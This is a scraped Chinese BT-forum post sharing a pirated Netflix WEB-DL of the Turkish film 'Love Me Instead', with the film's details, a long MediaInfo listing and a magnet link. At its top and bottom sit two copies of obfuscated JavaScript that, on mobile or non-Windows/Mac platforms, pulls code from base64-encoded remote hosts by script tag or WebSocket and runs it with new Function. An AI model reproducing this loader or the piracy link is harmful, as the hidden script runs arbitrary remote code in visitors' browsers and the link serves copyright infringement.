父情难却[中文字幕].Love.Me.Instead.2021.1080p.NF.WEB-DL.DDP5.1.Atmos.x264-bt9527.cc 10.72GB

版主小s 9天前 111

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 父情难却 / Love Me Instead

◎片 名 Beni ?ok Sev

◎年 代 2021

◎产 地 土耳其

◎类 别 剧情

◎语 言 土耳其语

◎上映日期 2021-11-19(土耳其)

◎IMDb链接 https://www.imdb.com/title/tt13161356/

◎豆瓣链接 https://movie.douban.com/subject/35642270/

◎片 长 124分钟

◎导 演 梅米特·艾达·厄兹泰金 Mehmet Ada ?ztekin (id:1435770)

◎演 员 萨尔普·阿克卡亚 Sarp Akkaya (id:1435774)

厄康·吉赛尔 Ercan Kesal (id:1301451)

◎标 签 M土耳其 / D梅米特·艾达·厄兹泰金 / 美国 / 电影 / 犯罪 / 文艺 / 戛纳 / 战争

◎简 介

一名囚犯在守卫的押解下前往家乡,试图和女儿重新建立联系并弥补自己的过错,但一场悲剧为他的旅程蒙上了阴影

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 51651564839207482214990487685125445005 (0x26DBBAC31F4A1250733C2A7CE025158D)

  4. Complete name : [email protected]DDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.7 GiB

  8. Duration : 2 h 4 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 12.3 Mb/s

  11. Encoded date : UTC 2021-11-21 05:30:39

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 4 min

  24. Bit rate mode : Variable

  25. Bit rate : 6 392 kb/s

  26. Maximum bit rate : 20.0 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.128

  37. Stream size : 5.58 GiB (52%)

  38. Writing library : x264 core 148 r2724 dbe0335

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=6 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=16.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3 JOC

  45. Format/Info : Enhanced AC-3 with Joint Object Coding

  46. Commercial name : Dolby Digital Plus with Dolby Atmos

  47. Codec ID : A_EAC3

  48. Duration : 2 h 4 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 686 MiB (6%)

  57. Title : Turkish

  58. Language : Turkish

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No

  62. Complexity index : 16

  63. Number of dynamic objects : 15

  64. Bed channel count : 1 channel

  65. Bed channel configuration : LFE


  66. Audio #2

  67. ID : 3

  68. Format : E-AC-3

  69. Format/Info : Enhanced AC-3

  70. Commercial name : Dolby Digital Plus

  71. Codec ID : A_EAC3

  72. Duration : 2 h 4 min

  73. Bit rate mode : Constant

  74. Bit rate : 640 kb/s

  75. Channel(s) : 6 channels

  76. Channel layout : L R C LFE Ls Rs

  77. Sampling rate : 48.0 kHz

  78. Frame rate : 31.250 FPS (1536 SPF)

  79. Compression mode : Lossy

  80. Stream size : 572 MiB (5%)

  81. Title : English

  82. Language : English

  83. Service kind : Complete Main

  84. Default : No

  85. Forced : No


  86. Audio #3

  87. ID : 4

  88. Format : E-AC-3

  89. Format/Info : Enhanced AC-3

  90. Commercial name : Dolby Digital Plus

  91. Codec ID : A_EAC3

  92. Duration : 2 h 4 min

  93. Bit rate mode : Constant

  94. Bit rate : 640 kb/s

  95. Channel(s) : 6 channels

  96. Channel layout : L R C LFE Ls Rs

  97. Sampling rate : 48.0 kHz

  98. Frame rate : 31.250 FPS (1536 SPF)

  99. Compression mode : Lossy

  100. Stream size : 572 MiB (5%)

  101. Title : Arabic Syria

  102. Language : Arabic

  103. Service kind : Complete Main

  104. Default : No

  105. Forced : No


  106. Audio #4

  107. ID : 5

  108. Format : E-AC-3

  109. Format/Info : Enhanced AC-3

  110. Commercial name : Dolby Digital Plus

  111. Codec ID : A_EAC3

  112. Duration : 2 h 4 min

  113. Bit rate mode : Constant

  114. Bit rate : 640 kb/s

  115. Channel(s) : 6 channels

  116. Channel layout : L R C LFE Ls Rs

  117. Sampling rate : 48.0 kHz

  118. Frame rate : 31.250 FPS (1536 SPF)

  119. Compression mode : Lossy

  120. Stream size : 572 MiB (5%)

  121. Title : French

  122. Language : French

  123. Service kind : Complete Main

  124. Default : No

  125. Forced : No


  126. Audio #5

  127. ID : 6

  128. Format : E-AC-3

  129. Format/Info : Enhanced AC-3

  130. Commercial name : Dolby Digital Plus

  131. Codec ID : A_EAC3

  132. Duration : 2 h 4 min

  133. Bit rate mode : Constant

  134. Bit rate : 640 kb/s

  135. Channel(s) : 6 channels

  136. Channel layout : L R C LFE Ls Rs

  137. Sampling rate : 48.0 kHz

  138. Frame rate : 31.250 FPS (1536 SPF)

  139. Compression mode : Lossy

  140. Stream size : 572 MiB (5%)

  141. Title : German

  142. Language : German

  143. Service kind : Complete Main

  144. Default : No

  145. Forced : No


  146. Audio #6

  147. ID : 7

  148. Format : E-AC-3

  149. Format/Info : Enhanced AC-3

  150. Commercial name : Dolby Digital Plus

  151. Codec ID : A_EAC3

  152. Duration : 2 h 4 min

  153. Bit rate mode : Constant

  154. Bit rate : 640 kb/s

  155. Channel(s) : 6 channels

  156. Channel layout : L R C LFE Ls Rs

  157. Sampling rate : 48.0 kHz

  158. Frame rate : 31.250 FPS (1536 SPF)

  159. Compression mode : Lossy

  160. Stream size : 572 MiB (5%)

  161. Title : Polish

  162. Language : Polish

  163. Service kind : Complete Main

  164. Default : No

  165. Forced : No


  166. Audio #7

  167. ID : 8

  168. Format : E-AC-3

  169. Format/Info : Enhanced AC-3

  170. Commercial name : Dolby Digital Plus

  171. Codec ID : A_EAC3

  172. Duration : 2 h 4 min

  173. Bit rate mode : Constant

  174. Bit rate : 640 kb/s

  175. Channel(s) : 6 channels

  176. Channel layout : L R C LFE Ls Rs

  177. Sampling rate : 48.0 kHz

  178. Frame rate : 31.250 FPS (1536 SPF)

  179. Compression mode : Lossy

  180. Stream size : 572 MiB (5%)

  181. Title : Brazilian Portuguese

  182. Language : Portuguese

  183. Service kind : Complete Main

  184. Default : No

  185. Forced : No


  186. Audio #8

  187. ID : 9

  188. Format : E-AC-3

  189. Format/Info : Enhanced AC-3

  190. Commercial name : Dolby Digital Plus

  191. Codec ID : A_EAC3

  192. Duration : 2 h 4 min

  193. Bit rate mode : Constant

  194. Bit rate : 640 kb/s

  195. Channel(s) : 6 channels

  196. Channel layout : L R C LFE Ls Rs

  197. Sampling rate : 48.0 kHz

  198. Frame rate : 31.250 FPS (1536 SPF)

  199. Compression mode : Lossy

  200. Stream size : 572 MiB (5%)

  201. Title : Spanish

  202. Language : Spanish

  203. Service kind : Complete Main

  204. Default : No

  205. Forced : No


  206. Audio #9

  207. ID : 10

  208. Format : E-AC-3

  209. Format/Info : Enhanced AC-3

  210. Commercial name : Dolby Digital Plus

  211. Codec ID : A_EAC3

  212. Duration : 2 h 4 min

  213. Bit rate mode : Constant

  214. Bit rate : 640 kb/s

  215. Channel(s) : 6 channels

  216. Channel layout : L R C LFE Ls Rs

  217. Sampling rate : 48.0 kHz

  218. Frame rate : 31.250 FPS (1536 SPF)

  219. Compression mode : Lossy

  220. Stream size : 572 MiB (5%)

  221. Title : European Spanish

  222. Language : Spanish

  223. Service kind : Complete Main

  224. Default : No

  225. Forced : No


  226. Text #1

  227. ID : 11

  228. Format : UTF-8

  229. Codec ID : S_TEXT/UTF8

  230. Codec ID/Info : UTF-8 Plain Text

  231. Duration : 1 h 59 min

  232. Bit rate : 44 b/s

  233. Count of elements : 1337

  234. Stream size : 38.6 KiB (0%)

  235. Title : English

  236. Language : English

  237. Default : Yes

  238. Forced : No


  239. Text #2

  240. ID : 12

  241. Format : UTF-8

  242. Codec ID : S_TEXT/UTF8

  243. Codec ID/Info : UTF-8 Plain Text

  244. Duration : 1 h 59 min

  245. Bit rate : 73 b/s

  246. Count of elements : 1338

  247. Stream size : 64.5 KiB (0%)

  248. Title : Arabic

  249. Language : Arabic

  250. Default : No

  251. Forced : No


  252. Text #3

  253. ID : 13

  254. Format : UTF-8

  255. Codec ID : S_TEXT/UTF8

  256. Codec ID/Info : UTF-8 Plain Text

  257. Duration : 2 h 3 min

  258. Bit rate : 43 b/s

  259. Count of elements : 1354

  260. Stream size : 39.5 KiB (0%)

  261. Title : Chinese Simplified

  262. Language : Chinese

  263. Default : No

  264. Forced : No


  265. Text #4

  266. ID : 14

  267. Format : UTF-8

  268. Codec ID : S_TEXT/UTF8

  269. Codec ID/Info : UTF-8 Plain Text

  270. Duration : 2 h 3 min

  271. Bit rate : 44 b/s

  272. Count of elements : 1338

  273. Stream size : 40.0 KiB (0%)

  274. Title : Chinese Traditional

  275. Language : Chinese

  276. Default : No

  277. Forced : No


  278. Text #5

  279. ID : 15

  280. Format : UTF-8

  281. Codec ID : S_TEXT/UTF8

  282. Codec ID/Info : UTF-8 Plain Text

  283. Duration : 2 h 3 min

  284. Bit rate : 38 b/s

  285. Count of elements : 1331

  286. Stream size : 35.0 KiB (0%)

  287. Title : Croatian

  288. Language : Croatian

  289. Default : No

  290. Forced : No


  291. Text #6

  292. ID : 16

  293. Format : UTF-8

  294. Codec ID : S_TEXT/UTF8

  295. Codec ID/Info : UTF-8 Plain Text

  296. Duration : 2 h 3 min

  297. Bit rate : 38 b/s

  298. Count of elements : 1355

  299. Stream size : 35.3 KiB (0%)

  300. Title : Czech

  301. Language : Czech

  302. Default : No

  303. Forced : No


  304. Text #7

  305. ID : 17

  306. Format : UTF-8

  307. Codec ID : S_TEXT/UTF8

  308. Codec ID/Info : UTF-8 Plain Text

  309. Duration : 2 h 3 min

  310. Bit rate : 40 b/s

  311. Count of elements : 1265

  312. Stream size : 36.4 KiB (0%)

  313. Title : Danish

  314. Language : Danish

  315. Default : No

  316. Forced : No


  317. Text #8

  318. ID : 18

  319. Format : UTF-8

  320. Codec ID : S_TEXT/UTF8

  321. Codec ID/Info : UTF-8 Plain Text

  322. Duration : 2 h 3 min

  323. Bit rate : 38 b/s

  324. Count of elements : 1271

  325. Stream size : 34.6 KiB (0%)

  326. Title : Dutch

  327. Language : Dutch

  328. Default : No

  329. Forced : No


  330. Text #9

  331. ID : 19

  332. Format : UTF-8

  333. Codec ID : S_TEXT/UTF8

  334. Codec ID/Info : UTF-8 Plain Text

  335. Duration : 2 h 3 min

  336. Bit rate : 38 b/s

  337. Count of elements : 1220

  338. Stream size : 35.3 KiB (0%)

  339. Title : Finnish

  340. Language : Finnish

  341. Default : No

  342. Forced : No


  343. Text #10

  344. ID : 20

  345. Format : UTF-8

  346. Codec ID : S_TEXT/UTF8

  347. Codec ID/Info : UTF-8 Plain Text

  348. Duration : 2 h 3 min

  349. Bit rate : 42 b/s

  350. Count of elements : 1326

  351. Stream size : 38.7 KiB (0%)

  352. Title : French

  353. Language : French

  354. Default : No

  355. Forced : No


  356. Text #11

  357. ID : 21

  358. Format : UTF-8

  359. Codec ID : S_TEXT/UTF8

  360. Codec ID/Info : UTF-8 Plain Text

  361. Duration : 2 h 3 min

  362. Bit rate : 41 b/s

  363. Count of elements : 1298

  364. Stream size : 37.9 KiB (0%)

  365. Title : German

  366. Language : German

  367. Default : No

  368. Forced : No


  369. Text #12

  370. ID : 22

  371. Format : UTF-8

  372. Codec ID : S_TEXT/UTF8

  373. Codec ID/Info : UTF-8 Plain Text

  374. Duration : 2 h 3 min

  375. Bit rate : 70 b/s

  376. Count of elements : 1328

  377. Stream size : 64.3 KiB (0%)

  378. Title : Greek

  379. Language : Greek

  380. Default : No

  381. Forced : No


  382. Text #13

  383. ID : 23

  384. Format : UTF-8

  385. Codec ID : S_TEXT/UTF8

  386. Codec ID/Info : UTF-8 Plain Text

  387. Duration : 2 h 3 min

  388. Bit rate : 67 b/s

  389. Count of elements : 1391

  390. Stream size : 60.9 KiB (0%)

  391. Title : Hebrew

  392. Language : Hebrew

  393. Default : No

  394. Forced : No


  395. Text #14

  396. ID : 24

  397. Format : UTF-8

  398. Codec ID : S_TEXT/UTF8

  399. Codec ID/Info : UTF-8 Plain Text

  400. Duration : 2 h 3 min

  401. Bit rate : 40 b/s

  402. Count of elements : 1325

  403. Stream size : 36.4 KiB (0%)

  404. Title : Hungarian

  405. Language : Hungarian

  406. Default : No

  407. Forced : No


  408. Text #15

  409. ID : 25

  410. Format : UTF-8

  411. Codec ID : S_TEXT/UTF8

  412. Codec ID/Info : UTF-8 Plain Text

  413. Duration : 2 h 3 min

  414. Bit rate : 40 b/s

  415. Count of elements : 1354

  416. Stream size : 36.4 KiB (0%)

  417. Title : Indonesian

  418. Language : Indonesian

  419. Default : No

  420. Forced : No


  421. Text #16

  422. ID : 26

  423. Format : UTF-8

  424. Codec ID : S_TEXT/UTF8

  425. Codec ID/Info : UTF-8 Plain Text

  426. Duration : 2 h 3 min

  427. Bit rate : 39 b/s

  428. Count of elements : 1339

  429. Stream size : 35.8 KiB (0%)

  430. Title : Italian

  431. Language : Italian

  432. Default : No

  433. Forced : No


  434. Text #17

  435. ID : 27

  436. Format : UTF-8

  437. Codec ID : S_TEXT/UTF8

  438. Codec ID/Info : UTF-8 Plain Text

  439. Duration : 2 h 3 min

  440. Bit rate : 46 b/s

  441. Count of elements : 1493

  442. Stream size : 41.8 KiB (0%)

  443. Title : Japanese

  444. Language : Japanese

  445. Default : No

  446. Forced : No


  447. Text #18

  448. ID : 28

  449. Format : UTF-8

  450. Codec ID : S_TEXT/UTF8

  451. Codec ID/Info : UTF-8 Plain Text

  452. Duration : 2 h 3 min

  453. Bit rate : 52 b/s

  454. Count of elements : 1379

  455. Stream size : 47.4 KiB (0%)

  456. Title : Korean

  457. Language : Korean

  458. Default : No

  459. Forced : No


  460. Text #19

  461. ID : 29

  462. Format : UTF-8

  463. Codec ID : S_TEXT/UTF8

  464. Codec ID/Info : UTF-8 Plain Text

  465. Duration : 2 h 3 min

  466. Bit rate : 40 b/s

  467. Count of elements : 1376

  468. Stream size : 37.0 KiB (0%)

  469. Title : Malay

  470. Language : Malay

  471. Default : No

  472. Forced : No


  473. Text #20

  474. ID : 30

  475. Format : UTF-8

  476. Codec ID : S_TEXT/UTF8

  477. Codec ID/Info : UTF-8 Plain Text

  478. Duration : 1 h 59 min

  479. Bit rate : 44 b/s

  480. Count of elements : 1174

  481. Stream size : 39.4 KiB (0%)

  482. Title : Norwegian Bokmal

  483. Language : Norwegian Bokmal

  484. Default : No

  485. Forced : No


  486. Text #21

  487. ID : 31

  488. Format : UTF-8

  489. Codec ID : S_TEXT/UTF8

  490. Codec ID/Info : UTF-8 Plain Text

  491. Duration : 2 h 3 min

  492. Bit rate : 40 b/s

  493. Count of elements : 1363

  494. Stream size : 37.0 KiB (0%)

  495. Title : Polish

  496. Language : Polish

  497. Default : No

  498. Forced : No


  499. Text #22

  500. ID : 32

  501. Format : UTF-8

  502. Codec ID : S_TEXT/UTF8

  503. Codec ID/Info : UTF-8 Plain Text

  504. Duration : 2 h 3 min

  505. Bit rate : 40 b/s

  506. Count of elements : 1334

  507. Stream size : 36.8 KiB (0%)

  508. Title : Portuguese

  509. Language : Portuguese

  510. Default : No

  511. Forced : No


  512. Text #23

  513. ID : 33

  514. Format : UTF-8

  515. Codec ID : S_TEXT/UTF8

  516. Codec ID/Info : UTF-8 Plain Text

  517. Duration : 1 h 59 min

  518. Bit rate : 42 b/s

  519. Count of elements : 1295

  520. Stream size : 37.0 KiB (0%)

  521. Title : Brazilian Portuguese

  522. Language : Portuguese

  523. Default : No

  524. Forced : No


  525. Text #24

  526. ID : 34

  527. Format : UTF-8

  528. Codec ID : S_TEXT/UTF8

  529. Codec ID/Info : UTF-8 Plain Text

  530. Duration : 2 h 3 min

  531. Bit rate : 46 b/s

  532. Count of elements : 1270

  533. Stream size : 42.2 KiB (0%)

  534. Title : Romanian

  535. Language : Romanian

  536. Default : No

  537. Forced : No


  538. Text #25

  539. ID : 35

  540. Format : UTF-8

  541. Codec ID : S_TEXT/UTF8

  542. Codec ID/Info : UTF-8 Plain Text

  543. Duration : 2 h 3 min

  544. Bit rate : 69 b/s

  545. Count of elements : 1409

  546. Stream size : 63.2 KiB (0%)

  547. Title : Russian

  548. Language : Russian

  549. Default : No

  550. Forced : No


  551. Text #26

  552. ID : 36

  553. Format : UTF-8

  554. Codec ID : S_TEXT/UTF8

  555. Codec ID/Info : UTF-8 Plain Text

  556. Duration : 2 h 3 min

  557. Bit rate : 42 b/s

  558. Count of elements : 1340

  559. Stream size : 38.4 KiB (0%)

  560. Title : Spanish

  561. Language : Spanish

  562. Default : No

  563. Forced : No


  564. Text #27

  565. ID : 37

  566. Format : UTF-8

  567. Codec ID : S_TEXT/UTF8

  568. Codec ID/Info : UTF-8 Plain Text

  569. Duration : 2 h 3 min

  570. Bit rate : 38 b/s

  571. Count of elements : 1317

  572. Stream size : 35.3 KiB (0%)

  573. Title : European Spanish

  574. Language : Spanish

  575. Default : No

  576. Forced : No


  577. Text #28

  578. ID : 38

  579. Format : UTF-8

  580. Codec ID : S_TEXT/UTF8

  581. Codec ID/Info : UTF-8 Plain Text

  582. Duration : 2 h 3 min

  583. Bit rate : 44 b/s

  584. Count of elements : 1128

  585. Stream size : 40.3 KiB (0%)

  586. Title : Swedish

  587. Language : Swedish

  588. Default : No

  589. Forced : No


  590. Text #29

  591. ID : 39

  592. Format : UTF-8

  593. Codec ID : S_TEXT/UTF8

  594. Codec ID/Info : UTF-8 Plain Text

  595. Duration : 2 h 3 min

  596. Bit rate : 109 b/s

  597. Count of elements : 1477

  598. Stream size : 99.3 KiB (0%)

  599. Title : Thai

  600. Language : Thai

  601. Default : No

  602. Forced : No


  603. Text #30

  604. ID : 40

  605. Format : UTF-8

  606. Codec ID : S_TEXT/UTF8

  607. Codec ID/Info : UTF-8 Plain Text

  608. Duration : 2 h 2 min

  609. Bit rate : 70 b/s

  610. Count of elements : 1674

  611. Stream size : 63.5 KiB (0%)

  612. Title : Turkish

  613. Language : Turkish

  614. Default : No

  615. Forced : No


  616. Text #31

  617. ID : 41

  618. Format : UTF-8

  619. Codec ID : S_TEXT/UTF8

  620. Codec ID/Info : UTF-8 Plain Text

  621. Duration : 2 h 3 min

  622. Bit rate : 65 b/s

  623. Count of elements : 1338

  624. Stream size : 59.4 KiB (0%)

  625. Title : Ukrainian

  626. Language : Ukrainian

  627. Default : No

  628. Forced : No


  629. Text #32

  630. ID : 42

  631. Format : UTF-8

  632. Codec ID : S_TEXT/UTF8

  633. Codec ID/Info : UTF-8 Plain Text

  634. Duration : 2 h 3 min

  635. Bit rate : 57 b/s

  636. Count of elements : 1332

  637. Stream size : 52.5 KiB (0%)

  638. Title : Vietnamese

  639. Language : Vietnamese

  640. Default : No

  641. Forced : No


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:7E9CC9B5D9F9429F3A3CAB07139BA9DABB9CBB25

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};